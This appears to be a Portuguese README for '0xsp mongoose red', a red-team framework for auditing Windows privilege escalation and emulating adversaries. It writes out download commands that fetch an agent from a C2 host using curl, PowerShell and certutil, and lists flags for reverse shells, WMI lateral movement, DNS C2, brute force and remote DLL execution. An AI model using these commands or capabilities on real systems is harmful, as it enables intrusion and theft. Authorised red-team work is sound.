
um framework único para simulação de segurança cibernética e operações de red team, auditoria do Windows para vulnerabilidades mais recentes, configurações incorretas e ataques de escalonamento de privilégios, replicar as táticas e técnicas de um adversário avançado em uma rede.
Apoie o projeto para desenvolvimento contínuo (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
Versão Atual 2.2.0
A versão 0xsp mongoose red é fornecida para auxiliar suas necessidades durante a simulação de segurança cibernética. Usando esta versão, você poderá auditar um sistema operacional Windows alvo em busca de vulnerabilidades de sistema, configurações incorretas e ataques de escalonamento de privilégios, e replicar as táticas e técnicas de um adversário avançado em uma rede.
com suporte a Node.js para API de aplicação web, torna-se muito mais fácil a instalação e personalização de maneira oportuna. O agente sensor Windows se comunicará com a API da aplicação para transferir resultados e receber comandos como técnica bidirecional.
o agente é capaz de identificar e detectar exploits do Windows usando os módulos windows update api e exploit database definitions. A nova versão também detectará as seguintes vulnerabilidades.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
credenciais de acesso padrão:
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#example 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --recuperar serviços do Windows e drivers instalados.
-u --recuperar informações sobre usuários, grupos, funções.
-c --pesquisar drivers conectados por arquivos de configuração sensíveis por extensão.
-n --recuperar informações de rede, interfaces de rede, detalhes de conexão.
-w --enumerar diretórios graváveis, verificar permissão de acesso, permissões modificadas.
-i --enumerar informações do sistema Windows, sessões, verificação de Always Elevated.
-l --pesquisar em qualquer arquivo por uma string específica, ex: agent.exe -l c:\ password *.config.
-o --especificar endereço do host da aplicação Node.js, você também pode usar srvhost.
-p --enumerar softwares instalados, processos em execução, tarefas.
-e --ferramenta de inspeção do kernel, ajudará a pesquisar em bancos de dados de ferramentas por vulnerabilidades do kernel do Windows.
-x --senha para autorizar sua conexão com a aplicação Node.js.
-d --baixar arquivos diretamente na máquina alvo.
-t --enviar arquivos da máquina alvo para a aplicação Node.js.
-spooler --escanear um único host ou lista de hosts para possível CVE-2021-1675 (ex: -spooler -srvhost ou -spooler -hosts )
-m --executar todos os tipos de varredura conhecidos juntos.
[!] SEÇÃO DE TÁTICAS DE RED TEAM
-r --criar um shell reverso com conta específica.
-lr --Técnica de movimentação lateral usando WMI (ex: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --descoberta de rede e enumeração de compartilhamentos
-dns --estabelecer shell interativo DNS C2C
-cmd --transferir comandos via HTTP Shell
-interactive --iniciar modo interativo (ex: carregar plugins, etc.)
-username --autenticação de identidade para módulos de ataque específicos.
-password --autenticação de identidade para módulos de ataque específicos.
-host --identificar host remoto para conduzir um ataque.
-srvhost --definir rhost da aplicação Node.js.
-bf --módulo de força bruta de usuários locais / usuários de domínio
-import --importar e executar arquivo dll localmente
-remote --importar e executar arquivo dll de um host remoto
https://0xsp.com/security%20dev/0xsp-mongoose-red
certifique-se de se inscrever no seguinte canal para ser notificado quando novos tutoriais e truques forem publicados para o 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg